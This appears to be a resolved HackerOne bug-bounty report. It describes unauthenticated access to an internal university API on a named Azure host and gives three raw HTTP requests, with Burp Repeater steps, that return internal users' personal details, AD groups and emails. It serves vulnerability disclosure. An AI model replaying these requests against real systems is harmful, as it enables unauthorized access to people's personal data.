Unauthenticated access to internal API at██████████.███.edu [HtUS]
High
Vulnerability Details
#Overview:
* There are multiple API calls using which an attacker user is able to gain unauthenticated access to internal API████████.██████.edu via Azure API url appg3entcalapi.azurewebsites.net.
* The access to█████.██████.edu is via microsoft and only allows internal users to access it.
* The appg3entcalapi.azurewebsites.net is listed as the API under the javascript located at [https://eventscalendar.████.edu/app.js](https://eventscalendar.██████.edu/app.js)
██████
#Steps to reproduce:
#(I) Vulnerable Request: Disclose PII of internal users-
```
GET /api/person/Default.GetAllPersons HTTP/1.1
Host: appg3entcalapi.azurewebsites.net
Dnt: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 2
{}
```
* Copy the above vulnerable request to your BURP repeater tab and fire the request.
* Notice the 200 OK response disclosing the details.
██████████
#(II) Vulnerable Request: Disclose adgroups & internal emails-
```
GET /api/AdGroup HTTP/1.1
Host: appg3entcalapi.azurewebsites.net
Dnt: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Content-Length: 2
{}
```
* Copy the above vulnerable request to your BURP repeater tab and fire the request.
* Notice the 200 OK response disclosing the details.
█████
#(III) Vulnerable Request:
```
GET /api/EventType HTTP/1.1
Host: appg3entcalapi.azurewebsites.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 2
{}
```
* Copy the above vulnerable request to your BURP repeater tab and fire the request.
* Notice the 200 OK response disclosing the details.
███████
## Impact
Unauthenticated access to internal API at████.████████.edu
Actions
View on HackerOneReport Stats
- Report ID: 1627980
- State: Closed
- Substate: resolved
- Upvotes: 9